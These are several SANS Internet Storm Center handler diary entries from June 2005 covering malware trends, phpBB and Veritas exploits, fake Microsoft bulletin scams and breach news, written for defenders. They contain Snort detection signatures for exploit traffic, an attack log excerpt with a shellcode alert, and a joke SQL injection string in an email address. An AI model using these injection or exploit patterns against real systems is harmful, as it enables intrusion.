Published: 2005-06-30

Packet-Filtering Malware;XMLRPC Vulnerabilities;phpBB highlight vulnerability;Fake MS Bulletins

Packet-Filtering Malware

We had some readers (thanks Steve) write in regarding a new malware strategy of filtering packets instead of mucking with the local hosts files

mentioned in the excellent F-Secure blog


and the full description here:


So instead of redirecting Anti-Virus sites to localhost (


and essentially preventing firewall and anti-virus updates from occurring, www.pandasoftware.com www.symantec.com www.mcafee.com

it blocks the actual network traffic. Much harder to detect and troubleshoot.
I guess we need healthchecking in all of our Anti-Virus now, so the end user
can alerted if updates can't be retrieved (but I'm sure most users would really love
to have another pop-up warning window...)

XMLRPC Vulnerabilities (fixed)

James Bercegay wrote in regarding several security holes he discovered
in XMLRPC libraries for PHP:


Version 1.1 is vulnerable to remote code execution via
a careless eval call. The hole has been fixed and a patch is available.


Versions 1.3.0 and earlier are vulnerable to remote code
execution. The issue has been fixed and a patch is available.

These libraries are found in a number of applications such as

postnuke, drupal, TikiWiki, and b2evolution.

Advisory Info:





Thanks for the heads-up James and the excellent job working with the vendors and
the conscientious disclosure.


Some recent reports of click-fraud malware (Backdoor.Win32.DSSdoor.b)

Excellent technical writeup:


Reporting Phishing

If you have discovered phishing, here are some reporting links that may come in handy:


Reporting page:


Here is a resource for government reporting sites:


phpBB Highlight Vulnerability Re-introduced

We've had some folks writing in regarding snort signatures for the new phpBB vulnerability.

This vulnerability is an accidental re-introduction of the same bug

that existed in phpBB earlier than 2.0.11 and was (apparently) accidentally

reintroduced during work between 2.0.14 and 2.0.15. Existing snort

signatures {sourcefire sid:2229 and bleeding-snort sids:2001457, 2001557,

2001604, and 2001605} will detect the common exploits.

Also, a more generic treatment of this vulnerability is as follows:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (sid:2005063001; rev:1; \
msg:"[ISC] possible phpBB <= 2.0.15 code injection"; \
flow:to_server,established; \
uricontent:"viewtopic.php|3f|"; nocase; \
pcre:"/[?&]highlight=(.\.|%27%2E|%2527%252E)\S+\(/iU"; \
classtype:misc-attack; )

One Final Note: This is the bug that allowed Santy.A to work.

Windows Update Alternative

Alternative to Windows Update that many sysadmins may find useful (Thanks Matt):

For Windows 2000 SP4, WinXP SP1 and SP2 or Windows 2003 systems which have updated to the newest version of IE:


Fake Microsoft Security Bulletins Alert

A lot of reports have been streaming in regarding fake Microsoft Security Bulletins:
Which were recently mentioned here by Kevin Hong (http://isc.sans.org/diary.php?date=2005-06-28)
It is always best to use the standard methods of patch updates (Windows|Microsoft Update)
instead of relying on information or URLs provided in an email.
Especially at the current time where there is some confusion over the new Updater for XP (mentioned in yesterday's diary) and the Rollup patch for Windows 2000 SP4 which has been causing some issues in some environments. Just take a deep breath and double-check everything before executing code (updates, etc) as Administrator.

Robert Danford

ISC Handler of the Day


Published: 2005-06-29

phpBB Update; Potential IE Vulnerability; Update Rollup for Win2k; Updated Package Installer for WinXP

Today's diary describes recent vulnerabilities in phpBB and Internet Explorer, and discusses Windows updates that Microsoft released yesterday.

phpBB 2.0.16 Fixes a Critical Security Issue

If you're using the popular phpBB bulletin board package, it's time to upgrade. Version 2.0.16, released earlier this week, fixes a critical security issue that can lead to the compromise of the vulnerable web server. The problem is with the viewtopic.php script, which, according to the fails to properly validate input when processing the "highlight" parameter. A similar vulnerability was being exploited by the Santy worm to deface web sites about half a year ago, as we reported in the . Please update your copy of phpBB to help prevent another such worm from gaining steam.

For information about the phpBB 2.0.16 release, see the
. You can get the updated package from . (Thanks to ISC reader Ronaldo for discussing the implications of this issue with us.)

Potential Internet Explorer COM Vulnerability

SEC Consult reported a condition in Internet Explorer that may lead to an exploitable vulnerability. The advisory points out that Internet Explorer does not properly handle the instantiation of non-ActiveX COM objects from web pages. According to the write-up, "loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE."

The published proof-of-concept code demonstrates the issue by invoking the javaprxy.dll COM object and crashing Internet Explorer, as tested in Internet Explorer 6 on Windows XP Service Pack 2. Although there are no patches to address the issue, a work-around is to disable ActiveX support in the browser. For more information about this issue, see the

Microsoft Releases Update Rollup for Windows 2000 SP4

Yesterday Microsoft released a package consisting of numerous patches to Windows 2000 Service Pack 4. This Update Rollup package "contains all security updates produced for Windows 2000 between the time SP4 was released and April 30, 2005, the time when the contents of the Update Rollup were locked down." Most importantly, the package "contains additional important fixes in files that have not previously been part of individual security updates." As a result, you should install this package if you are running Windows 2000 after you confirm that it doesn't conflict with your existing applications.

You can download this Update Rollup from Microsoft's Windows Update site. At the moment, the package is not available via Automatic Updates; however Microsoft indicated that it will enable Automatic Updates for the package in a few weeks. There will be no administrative tool for blocking the Update Rollup package, because it is not a formal Service Pack. Microsoft is treating this Update Rollup "like other security or reliability updates, which are normally distributed over Windows Update and via Automatic Updates."

For a listing of post-SP4 issues are addressed in this package, see the long table in
. For general information about this Update Rollup, see . Please note that this package is only applicable to Windows 2000.

This is expected to be the last mainstream update to Windows 2000, although Microsoft has
to the operating system until 2010. This means that the company will continue to offer security hotfixes for free until that date.

Microsoft Updates the Package Installer for Windows XP

Several readers wrote to us with questions about an unexpected notification they received yesterday from Automatic Update, asking them to install update 898461 for Windows XP. According to Microsoft, this update "installs a permanent copy of the Package Installer for Windows version on the computer so that subsequent software updates can have a significantly smaller download size." Before this update, all Package Installer files were downloaded every time you used "the Windows Update site or Automatic Updates to update the computer. This redundant download can be avoided if the installer files are made resident on the computer, because subsequent updates can use the resident files."

ISC reader Jeff pointed out that although this update is currently marked critical, it will shortly become mandatory. As Microsoft states in the Knowledge Base Article, as soon as this update "becomes mandatory, no future updates that are available from the Windows Update Web site or through Automatic Updates will include the Package Installer for Windows."

For more information about this update, see
. Please note that this package is only applicable to Windows XP.

Lenny Zeltser

ISC Handler of the Day



Published: 2005-06-28

Bot with Veritas; Internet crash in Pakistan; MS Security Bulletin Scam; MS05-017 Exploit

Net Bot with Veritas Exploit

One of our reader report that new BOT variant try to exploit the new Veritas vulnerability. The bot infected system start scanning tcp/10000 for further infection. The miscreants start adapt new Veritas vulnerability other variants BOT.

Internet crash in Pakistan

The Reuters report Pakistan has problem with Internet access and Telecommunication. Following the Reuter, the undersea calbe link has problem due to the power supply. You will find more information at following link.

If anyone have more information, please report to ISC.

MS Security Bulletin Scam

Following the one of our reader, the
the new email scam disguised as Microsft Security Bulletins. Users receive an email message which urges the immediate installation of a MS cumulative security patch. If user executes the file, use will be infected new BOT variant. If anyone have more information, please report to ISC.

MS05-017 Exploit

published new exploit for vulnerability. The MS05-017 is vulnerability in Message Queuing, the remote attacker can execute command from remote. It's time to patch and filter some unnecessary port.

Kevin Hong

Handler on Duty

Published: 2005-06-27

Port 10000; ssh brute forcing; yet another bagle?

Scans for port 10000/tcp have been increasing ever since the release of the Veritas Backup Exec exploit. This exploit is now available in various easy to use forms, including a Metasploit plug-in.

At this point, we are recommending:

(1) Block traffic to/from port 10000/tcp (note: this may be a bit tricky if you don\'t have a stateful firewall, as port 10000/tcp may be used by various clients as an ephemeral port)

(2) Verify that all your Veritas servers are patched.

(3) Scan your network for overlooked or already exploited Veritas servers.
One reader noted that after a system has been hit with the exploit, it will no longer listen on port 10000, as the service will die. However, it will still listen on port 6101.

Snort Signatures for the exploit as used by Metasploit (from Paul Dokas. Thanks!):

alert tcp $EXTERNAL_NET any -> $HOME_NET 10000
(msg: \"Possible BackupExec Exploit (inbound)\";
content: \"|00 00 03 00 00 02 00 58 58 58|\";
offset: 24; depth: 20; classtype: attempted-admin;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 10000
(msg: \"Possible BackupExec Exploit (outbound)\";
content: \"|00 00 03 00 00 02 00 58 58 58|\";
offset: 24; depth: 20; classtype: attempted-admin;)

Related URLs:

Veritas Announcement:




ssh brute forcing

Nothing fundamentally new. Nathaniel Hall observed a shift of attack sources from Asia to the US. Doesn't look like the nature of the attacks changed. Each source attempted to log in using a few hundred different user names.

Yet another Bagle

Frederick Lambany sent a sample of what looks like a newer Bagle version. Most AV products will catch this one using generic bagle signatures. Given the large number of bagle variants, it is hard to figure out if this one is actually new.
According to Virustotal, McAfee and Symantec are not detecting this sample at this point (will resubmit shortly to see if they have new signatures for it now).


Johannes Ullrich, Chief Research Officer, SANS Inst.

jullrich\'; drop table spamaddr;'@sans.org


Published: 2005-06-26

New Bagle; RECon REPort; DC702 Summit

New Bagle Variant

We're receiving early reports of a new Bagle variant making the rounds. At the time of writing, many Antivirus products are not detecting this most recent mutation of the mass mailer. Identifying characteristics include a reference to SMS in the subject line, and ZIP attachments with various names containing an EXE named f22-013.exe with an md5 checksum of 3f123980866092fedd6bc75e9b273087. Our thanks go out to the numerous ISC readers who alerted us to this.

RECon Wrapup

I recently returned from the security conference in Montreal, Canada. RECon fills a fairly unique niche as security conferences go, as it's focus lies mainly on reverse engineering as it is used in security work in addition to more general infosec material. This was the first year of the conference, and in my opinion things went very well. I'd like to take the opportunity on this "slow news day" to discuss some of the more interesting presentations from RECon. Just to note - all of the talks were great, but I'm limited on time and space, so my apologies if I didn't include something you felt was worthwhile.

Todd MacDermid

Todd gave an enlightening presentation on the privacy-focused cross-platform IM/VoIP/file-sharing application,
. His presentation is available . Cutlass aims to be the answer to private communications even for people who aren't sure why they need private communications. By having encryption as the default setting, Todd hopes to make encrypted communication the norm, rather than the exception. It's a nice idea, and one that would hopefully prevent future .

Cédric Blancher

Cédric (of
fame) released an entertaining new tool called which allows for seamless hijacking of wireless connections via traffic injection. No longer do you have to rudely knock a legitimate user offline to ... "borrow" ... his or her connection. You can be a true gentlemanly [h|cr]acker and allow them continued usage of their/your connection! Slides, code, and links to dependencies are available at the above link.

Robert E. Lee & Jack Louis

guys had a great presentation which highlighted a few of the thousands of things wrong with the current state of web application security. They also demonstrated a useful open source web application fuzzer named "Cruiser" which found some remote code execution vulnerabilities in popular applications they were running on their production servers. Their slides are available . Cruiser should be available any day now from the page and will be part of the toolkit along with .

Jose Nazario

Jose Nazario gave a lightning-paced presentation on the simplicity of rapidly developing security tools "The Monkey Way" - aka "How To Be Leet Like Dug Song." He covers effectively using libpcap, libdnet, and libnids using various languages in order to develop the tools you need to do things that haven't been done yet. His slides are available

Pedram Amini

Pedram Amini of
demoed a fantastic new bug-hunting tool named . To summarize (and probably do the tool injustice), Process Stalking allows an exploit hunter/reverse engineer to quickly whittle away the uninteresting and unimportant functions, leaving only the "stalked" functions - functions executed while attached to the process stalker - highlighted. This radically reduces binary code auditing time, and allows the reverser to spend more time exploiting and less time fishing. Additionally (what, the awesome tool wasn't enough?) Pedram launched , an open community dedicated to supporting and sharing knowledge among reverse engineers. While the site is still under heavy development, it's already got some good content and looks to be coming along nicely.

Johnathan Levin

Johnathan gave an eye-opening presentation on the evils that can be easily perpetrated using Winsock 2
. These are essentially session-level plugins that can arbitrarily alter anything being passed into or out of Winsock. A benign example of this is the operation of the Google Desktop Search - search results from your local machine are injected into google.com search results via a Layered Service Provider interface. Unfortunately, like many operating system features, this has a lot of potential to be abused (hellooooo spyware!). I can't located Johnathan's presentation online at the moment, but he'll apparently be presenting the material at DefCon as well, so if you're going to be in Vegas in a month, check it out. And, while you're there ...

DC702 Summit

Check out the
! It's a pre-DefCon shindig with the goal of affording easy access to various DefCon & Blackhat presenters along with other well known infosec personalities (including yours truly). This should be an intimate event with a hard limit of 200 attendees. In addition to being a great party with cool geeks, the Summit is also a fantastic fundraiser for the . They do a lot to protect (not manage) your digital rights, so this is the perfect way to give back. In the immortal words of , you've got to party for your right to fight. If you've got any questions about the Summit, please send them directly to me at caltheide@isc.sans.org.

That's all for this diary, boys, girls, and prototype autonomous agents. I hope you enjoyed today's entry, and if you've got any questions or comments, you know where to reach us.


Cory Altheide

Handler Without A Cause



*"Hamfisted" is the nicest adjective I could come up with, honest.
Published: 2005-06-25

New Veritas Exploit on the wild / Geek Wall art summary / Portuguese Language Community

New Veritas Exploit

We received some reports about spikes on port 10000. The main reason for that is the release of the exploit for Veritas, and used by the Metasploit Framework, as Marc wrote in yesterday´s diary.

An excerpt of the exploit is bellow:

'RHOST' => [1, 'ADDR', 'The target address'],

'RPORT' => [1, 'PORT', 'The target port', 10000],

One of our readers also sent an interesting note about the usage of the new Veritas Exploit:"...So, it seems this exploit is crashing the service listening on port 10000. If sysadmins know they have backup exec installed and they scan the system they will see port 6101 and 10000 normally. After the exploit it will show only the port 6101 still listening."

Geek Wall art

I would like to thank all SANS ISC readers that sent some really interesting(and funny) ideas for Marc´s request in yesterday´s diary!

Bellow is a collection of links and posters ideas: (Thanks guys, and...I want to believe too...)

1- http://googleblog.blogspot.com/2005/04/i-googlebot.html

2- http://www.javvin.com/

3- Mural of AOL CD's

4- http://www.network-science.de/ascii/

5- http://www.chris.com/ascii/

6- http://bhami.com/rosetta.html

7- BOFH material - "yea that one caught the .308 virus... pretty near killed the operator. We're installing kevlar CPU cases next week."

8- http://www.novaspace.com/Newstuff.html

9- http://xfiles.wearehere.net/believe.htm

10- http://opte.prolexic.com (own network maps)

11- "The Cognitive Style of Powerpoint"

12- http://www.openbsd.org/orders.html#posters

On my own room, I have SANS roadmap posters, Foundry IPv6 poster, Tripwire vulnerability Matrix posters and, the best soccer team in South America(ok, thats my opinion), Flamengo.

Portuguese Language Community

This week I received a link of a website about security in Portuguese language , it is called Linha Defensiva ( http://linhadefensiva.uol.com.br/ ). I would suggest you a try, if you can understand portuguese.

Another one for the Brazilian community, I will be presenting SANS ISC in a conference in Sao Paulo, from the Brazilian Network Security Workgroup, on July 5th ( http://eng.registro.br/gts/ ).


Handler on Duty: Pedro Bueno cGJ1ZW5vQGlzYy5zYW5zLm9yZw==


Published: 2005-06-24

New Exploits and Vulnerabilities; tcp/445 Wrap-up; 40 Million Credit Cards; HP .gif; Geek Wall Art

New Exploits and Vulnerabilities

published another exploit for a recent Microsoft vulnerability. Also, the added two new exploits to the Framework. published a new vulnerability in RealPlayer that allows for remote code execution. Not to be left out, published a vulnerability in their VPN 3000 Concentrator.

tcp/445 Wrap-up.

Based on Handler Mike Poor's request, several readers sent us their thoughts on the recent spike in tcp/445 traffic. The general consensus seems to be that there was no wide-spread Internet attack or scans. Others postulated that some locations might have been victims of "routine" scans on ports that are listed in the monthly Microsoft security advisories. Another thought was that what Symantec (and later the US-CERT and Gartner) reported was really based on increased bot activity. Regardless, we did not see any significant increases in the DShield database on tcp/445 but will continue to monitor the situation. (One footnote, a reader suggested that DShield might show a temporary rise as sensors begin to monitor tcp/445 at the request of the Internet Storm Center. Let's see what happens.)

40 Million Credit Card Thoughts

If you recall, last Friday a big story hit the wires about the exposure of 40 million credit card accounts at the Tucson office of
, a company that processes transactions on behalf of merchants and financial institutions. According to news reports, "only" 200 thousand or so accounts were actually exported by an automated tool that had access to the entire 40 million accounts. We received several notes from readers offering ideas about what happened and I'd like to dig a little deeper into one of the emails sent our way.

Dr. Neal Krawetz of
said on Saturday (June 18th) that he felt the compromise at CardSystems was just the most recent in a sudden increase of financial exploit reports. In the last five months he says there have been seven large compromises that we know of:

- February 2005: Bank of America lost tapes containing data for 1.2
million federal employees

- May 2005: Time Warner lost information for 600,000 employees; Insiders
at Bank of America and Sumitomo bank compromise accounts

- June 2005: Hackers gained access to about 600 customers at Equifax
Canada; CitiFinancial blamed UPS for losing backup data; and the
most recent CardSystems compromise

Prior to February, the few compromises made public were not as large and not clustered within a few months. Are these recent attacks related to increased activities of one group or gang? Or are they all coming to light because of new laws that require reporting? Or both?

Dr. Krawetz went on to say that, "at first I was thinking, 'Wow, Sarbanes/Oxley really has people reporting fraud! Wonder what wasn't reported publicly before SOX?' Now I'm wondering if these are all happening at the same time due to an organized group that found a massive weakness in the financial community..."

He continues, "Phishers and spammers generally start with a low attack volume. As they become comfortable, they increase volume and frequency. That seems to match the current pattern with these major financial compromises. Systems and processes are very similar among the financial community, leading to a homogeneous system where one attack vector will likely succeed in compromising many systems. This is why phishers target a variety of similar companies, and spammers offer an assortment of scams."

Finally he offers a conspiracy theory: "Is this the result of a few very professional (and very quiet) groups with a taste for very large compromises (Wow, what a conspiracy theory!) or a few groups that share a common knowledge? I find it hard to believe that 7 events in 5 months (or 6 events in the last 2
months) is coincidence, and copycats generally don't have the needed skill."

We still don't know "who done it" but we have some ideas. It's definitely not an adolescent script kiddie. It's also not a group that hangs out on IRC or other semi-public forums. This group understands OPSEC and is keeping their activities under close guard. I imagine that they are a bit miffed that they got caught and are taking extreme measures to prevent future detection.

Have you noticed the dramatic drop in Internet worms and viruses (except for the bots) in the past year? We have, and so have many other security experts. This is unnerving in that most of the current security protection tools are optimized for 1990s-style attacks. New attack methods slice right through firewalls, intrusion detection systems, and host-based defenses like anti virus software. We are beginning a new chapter in Internet history and I don't like the way this one is starting.

HP .gif

A reader asked if we knew what the purpose of the image at
http://hp.msn.com/c/home/flight/666.gif was for. He has a machine that requests that image every 30 seconds or so. We think it might be some HP software calling home to mama, but are curious if others are seeing this and have any ideas. If you do, please send them using our contact form at .

Geek Wall Art

One of our readers noted that the walls around his work area are devoid of art. He asked if perhaps the Internet Storm Center readers could suggest something to cover up the cracks in the plaster. So what is hanging on your server room (or cubicle) walls? Anything cool or unique? Let us know and we'll publish a list of the good ones later this weekend if the Internet doesn't crash. Matrix posters and SANS Roadmap charts don't count. We know that everybody has those. :)

Marcus H. Sachs

Director, SANS Internet Storm Center

Handler of the Day

Published: 2005-06-23

Exploit available for MS05-011, Rumored spikes in 445 scanning

Exploit available for MS05-011, Rumored spikes in 445 scanning

FrSIRT has published exploit code for the recent flaw in Microsoft Server Message Block (SMB). The advisory and patch related to this vulnerability were released on February 8th, 2005.

If you still have not patched, you are further urged to do so in light of the release of exploit code.

Spike in 445?

There has been much media attention in the past two days to the report by Gartner that there has been a massive spike in scanning for TCP port 445.



There was a spike around the 13th of May, but nothing out of the ordinary is showing on the Dshield data.


If you have noticed a recent spike in activity, please report it to the ISC.

Mike Poor



Published: 2005-06-22

Front Page Hack Update, Veritas Advisories

Front Page Hack

First off, thanks to all who sent in log snippets, pcaps or an analysis of the Front Page hack that Joshua reported in yesterday's diary.

To sum up what we've seen, the attack seems to have been first observed back in March and may be generated by a poorly written worm

One reader reported this to be a precursor to the download of lsd.exe which is detected by Symantec as although the behavior that has been reported doesn't seem to match Symantec's description.

Veritas Advisories

Published: 2005-06-21

CC Theft Worries Manipulated; Unusual FrontPage Hack; War Spying/Viewing

CC Theft Worries Manipulated

An article on TMCNet's site indicates that phishers are attempting to exploit the worries of credit card holders following last week's announcement of a break-in that could have revealed up to 4 million credit card numbers. Pleasant.

EDIT (6/22/2005-13:24 UTC): Bao Nguyen writes in correcting me, the reported theft was 40 million CC numbers, not 4 million numbers. He also points out that the referenced article may be incorrect, in that
indicate that only 13.9 CC numbers were MasterCard. Thanks Bao!

Unusual FrontPage Hack

Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort logs indicating an attempted Front Page hack on a system he is monitoring. The first entry indicates an attempt to exploit the chunked-encoding transfter bug:

[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 ->
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host:
..Transfer-Encoding: chunked..Content-Length: 1499....

Which is a normal scan I'm sure many readers are familiar with. The unusual bit is an x86 NOOP alert that followed:

[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 ->
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20

This output has been trimmed for space. Ryan indicates that there is no internal host at listening on port 191. If there are any other readers with similar log entries matching port 191 or the /lsd.* URL, please

War Spying/Viewing

I've taken an interest in the phenomenon of War Spying (aka War Viewing) lately. This activity targets open wireless video feeds transmitted unencrypted on the public wireless bands. Since the frequencies are public and the video traffic isn't encrypted, it's trivial for anyone with a consumer-grade video receiver to capture and record video feeds.

The idea of War Spying isn't new, but has been gaining popularity as evidenced by a few hacker videos that provide instruction on how to setup a War Spying rig:

Here's an interesting comment from one of the hackers in the From the Shadows video:

"The problem with using wireless cameras such as these for security is that anybody who has a powerful transmitter can simply override the signal, and if they have a video recording system on the back-end, the powerful signal will be recorded instead of the actual security camera. So, if someone wanted to rob the place, all they would need to do is override the signal and they would never be caught on tape."

I may be wrong, but isn't that what they did in Oceans 11? :)

Organizations concerned about the risk of War Spying are advised to identify what their exposure level is by assessing their video feeds before an attacker does. One option is to put together your own War Spying rig (see the video links for more information on doing that), or purchase a commercial handheld video scanner, such as the

EDIT: Reader Dean writes in with "The top of the receiving band on those is 2450 MHz, whereas the actual top of the unlicensed videocam radio band is 2474 MHz (or thereabouts)".
I believe the ISM band ends at 2462 MHz, which unfortunately means the ICOM IC-R3 radio falls a bit short. If there are other recommendations, please

UPDATE (6/22/2005-13:24 UTC): Reader Dean writes us again (muchos gracious Dean!) citing Part 15 FCC rules that indicates the upper-end of the ISM band in the US is 2.4835 GHz. This means that the ICOM unit will not be capable of identifying open video signals in the upper portions of the allowable spectrum. I've sent ICOM an email message to find out if it's possible to extend the IC-R3 functionality to include this band as well.

-Joshua Wright/Handler-on-Duty

Published: 2005-06-20

Administrata; MS05-026 exploits in the field? No, not really; OpenRBL ist Kaput; Passive Reconnaissance and the Disaster Response threat-space; mod_jrun exploit sweep


This is the after-lunch update, I usually like to have a morning, afternoon, and closing commentary updates, but wanted to let Lorna’s fine overview on the risks of moving and Identity Theft get a bit more eye-ball time. One should go back and read the weekend’s Diaries as a part of their Monday morning exercises.

MS05-026 exploits in the field?

The first incident of my shift involved an active exploit of MS05-026 (ED: no, Kevin, it’s actually MS05-001 as we see below.) A spam message was blasted out to potential “customers,” including the link to the poisoned website. It leveraged the MS05-026 (MS05-001, see above) (http://www.microsoft.com/technet/security/bulletin/MS05-001.mspx) HTML Help remote code execution (no, Security zone bypass) vulnerability to install a Haxdoor variant on the visitor (well, I got one part right.)

Update: The following AV tools detect the initial Help Control Exploit

Antivirus Version Update Result

ClamAV devel-20050501 06.20.2005 Exploit.Helpcontrol

eTrust-Iris 06.19.2005 HTML/HelpControl!Exploit!Trojan

eTrust-Vet 06.20.2005 HTML.HelpControl!exploit

Fortinet 06.20.2005 VBS/Phel.A-trM

Sybari 7.5.1314 06.20.2005 HTML/HelpControl!Exploit!Trojan

The following AV tools detect the Trojan dropped:

Antivirus Version Update Result

AntiVir 06.20.2005 BDS/Haxdoor.CW

Avira 06.20.2005 BDS/Haxdoor.CW

Fortinet 06.20.2005 W32/Haxdor.3048-tr

Kaspersky 06.20.2005 Backdoor.Win32.Haxdoor.cw

McAfee 4517 06.20.2005 BackDoor-BAC.gen.b

NOD32v2 1.1146 06.20.2005 a variant of Win32/Haxdoor

Sybari 7.5.1314 06.20.2005 Backdoor.Win32.Haxdoor.cw

Symantec 8.0 06.20.2005 Backdoor.Haxdoor.D

TheHacker 06.20.2005 Backdoor/Haxdoor.cw

VBA32 3.10.3 06.20.2005 Backdoor.Win32.Haxdoor.cw

I’d prefer to not post further details at this time to avoid false-positives or expose the readers to a real danger.

Update: If one were to do one’s job and follow-up on what Exploit.Helpcontrol really triggered on, a few minutes of effort would finally turn up a link to: http://www.microsoft.com/technet/security/bulletin/ms05-001.mspx
Ahh, such is the dangerous life of a volunteer incident handler, living on the edge of exposing your stupidity and suffering the wrath of readers. :-)

OpenRBL ist Kaput

Visitors to http:://openrbl.org are greeted with a message reporting the demise of this free service. They are reporting that one can find similar services from

http://moensted.dk/spam/ and


Passive Reconnaissance and the Disaster Response Threat-space

While shopping for a gift for my old man last week, my attention was grabbed by Michal Zalewski’s "Silence on the Wire: a Field guide to Passive Reconnaissance and Indirect Attacks". From a simple flip through it looks like some though-provoking chapters are in there. I picked up a copy—because I can’t resist another book to put on the bookshelf.

Recently, I participated in a disaster response drill with the State and Local Governments simulating a mass casualty accident. While managing my other duties in the drill, I took the opportunity to set up some passive sensors in the response centers to see what a potential attacker could pick-up on when a massive group of first- and second-responders converge on a disaster scene.

Remember to have a nice solstice, wether it be winter or summer in your area.
Remember to send your kind comments to:

Kevin Liston


There were the expected open 802.11x WAPs, but I was pleased to not see a plethora of wide open bluetooth devices full of juicy government contact numbers. This may be simply been caused by a lack of funds by said Governments to equip their staff with spiffy new cell phones though.

Mod_jrun exploits spotted

Ben, a reader, has spotted an up-tick in exploit attempts against mod_jrun on his servers.

And as always, make sure you’ve patched Macromedia Jrun

Solstice Wishes

Remember to have a nice solstice, be it winter or summer in your area!


Kevin Liston



Published: 2005-06-19

Moving Precautions for the Security Paranoid Types

Well, it has been a very quiet day for me as the Handler on Duty. As such, its hard to come up with a diary entry when its been quiet like this. At the
recommendation of fellow handler Scott Fendley and in light of the recent breaches in security for credit card companies and the concern for identity theft, I decided to focus this diary on a recent experience of mine.....a cross country move.

Our family has just transplanted ourselves from Arizona to West Virginia. Yes, we were quite the gaggle moving cross country in two vehicles. My husband in the lead in one vehicle pulling a Uhaul and a cat riding shotgun with him. I however followed in the other vehicle with four kids (ages 10 and under), three dogs and three fish. We got hammered by a massive hailstorm in Texas and had a Tornado barely miss us. It was quite an adventure and being prepared is very key. This move brought up alot of things that need to be considered to help protect against identity theft and to deal with natural disaster. Some of them take time, but they are well worth it and I wish I would have done some of them looking back now. These are things that I was concerned about with the move and things that hopefully will help someone else out.

Identity Theft

For us, prepping to move meant alot of people we didn't know coming in and out of our house. We only had a short time frame to move once we were notified of
my husband getting accepted for a job he applied for. As such, we had a cleaning team coming in, workers doing repairs around the house (with four kids??? there might have been a few minor repairs needed:>), painters, movers, real estate agents showing the house to people etc. It was absolute chaos and
impossible to monitor the activities of everyone that is there all the time. Here are some things to consider before people start showing up:

1. If there is time, go through all your documents and shred what you don't need. Its a good time for getting rid of things that aren't important. Make
sure you SHRED anything with personal information on it.

2. Make sure any bank statements, bills or any documents with personal/financial information are put away securely (to include jewelry and other valuables). It only takes a second for someone to see one laying out or open a desk drawer and grab a bank statement.

3. Also don't allow the movers to pack any financial documents, bills, tax statements etc. We transported those with us personally. It is too easy to have taken out of a box later when your not around or copy the information and then just put it back. You also don't know when you might need them along the way and what if that very box is the one that disappeared while movers transported it.

4. I would also make sure you have all of the SSN cards for family members, birth certificates, insurance documents, extra checks, etc are kept where you can get to them. In an emergency you don't want them packed at the very bottom of the stack. Just keep them in a secure place in the vehicle and take them into the hotel room with you at night.

5. Make sure all local bank accounts are closed if you aren't planning on keeping the bank as your banking center. If you do it in person, you can get the paperwork showing it was closed. Also, keep good records of any other accounts closed and bills payed. If you are switching banks, make sure your auto-drafts/auto-deposits all are changed and are pointing to the right account.

6. Don't forget to change your mailing address and/or put your mail on hold. If possible, have this go into effect a couple of days before you leave to ensure that mail isn't still being delivered. You don't want someone else getting your mail after they see you have gone. Especially junk mail for credit card offers etc. I would also recommend a credit check a month or two after you get to your destination to make sure that everything looks okay.

7. Transport your computer(s) with you. If your like most folks, my family included, you probably use Quicken or some other software to track your fiances etc. The last thing you need is to have your computer disappear with that kind of information on it whether by letting movers pack it or stolen from your vehicle (don't leave computer equipment in plain sight). You might want to just take your hard drive with you, but I wanted my whole network with me to have it available when I arrived. After all, isn't that the first thing everybody sets up? I'm sitting in a hotel right now typing this diary entry with my network happily set up around me while we wait for household goods to arrive. Its also handy if you pay bills online to make sure nothing is late. I would also make a couple (yes more than one) backups of the hard drive in case of an unforeseen natural disaster and/or accident occurring. Which leads me to my next area....

Natural Disasters/Accidents

You never can plan for when an accident happens or a natural disaster strikes. These are some things you can do to be prepared for them if they happen to happen to you.

1. Make sure all adults/older kids know where all the critical information is located like insurance cards, emergency phone numbers, insurance policies. Things can be very confusing in an emergency, but it is very important to have key things written down and have everyone know where things are located before you start your adventure. I would also send a copy to a trusted relative or two just so someone else has it as a back up.

2. You never can tell what can happen, so make sure your wills are updated and in a safe place where trusted folks have copies and/or know where they are.

3. Keep an emergency kit in your vehicle geared toward what you might encounter and know ahead of time what the weather may or may not do. We did this and still hit very bad weather. Research ahead of time the route your traveling and what you might encounter along the way. We went from the dangers of living in the desert right into tornado alley at a very active time of the year. Charged cells phones are critical here (trust me, ours became our life line during our adventure). Make sure you have your car charger with you.

4. Stay alert, make sure someone knows your route you plan on driving and pull over if your tired.

Okay, I could keep going on and on, but I'll stop for now. A move is a major event and protecting yourself is important. I hope this helps someone out there and if anyone has something that I missed that is important and could help folks protect themselves from identity theft and/or to be prepared in case of an accident or natural disaster. Even if your not moving, some of the points above will apply regardless and can help you to stay prepared.

I hope all of you dads out there had a wonderful Father's Day!

Lorna Hutcheson

Handler on Duty



Published: 2005-06-18

Sun ONE Messaging Server Vulnerability; Weaknesses in Wireless LAN Session Containment; Credit Card Breach

Sun ONE Messaging Server Vulnerability

There is a vulnerability reported in Sun ONE Messaging Server (iPlanet Messaging Server) that may allow a remote user to execute arbitrary Javascript on the target user's system that is using Internet Explorer.

Sun is working on a fix. For the details, please refer to:


Weaknesses in Wireless LAN Session Containment

One of our handlers, Joshua wrote a paper regarding the session containment feature in various WLAN IDS products. Basically, depending on the implementation, an attacker can evade this feature, and can use the traffic to passively identify the WLAN IDS, which is helpful to decide what attacks can be used without being detected by the IDS.

Over the weekend, you can enjoy reading his paper at:



Credit Card Breach

A few readers have submitted the news of a credit card breach that could potentially affect over 40 million card accounts.

Accordingly to the report, although the credit cards were compromised, the cards do not hold personal data such as social security numbers or birth dates and thus personal information are not at risk.

You can read the details at:




Published: 2005-06-17

Inside SANS Institute; Conference Links from Reader Submissions

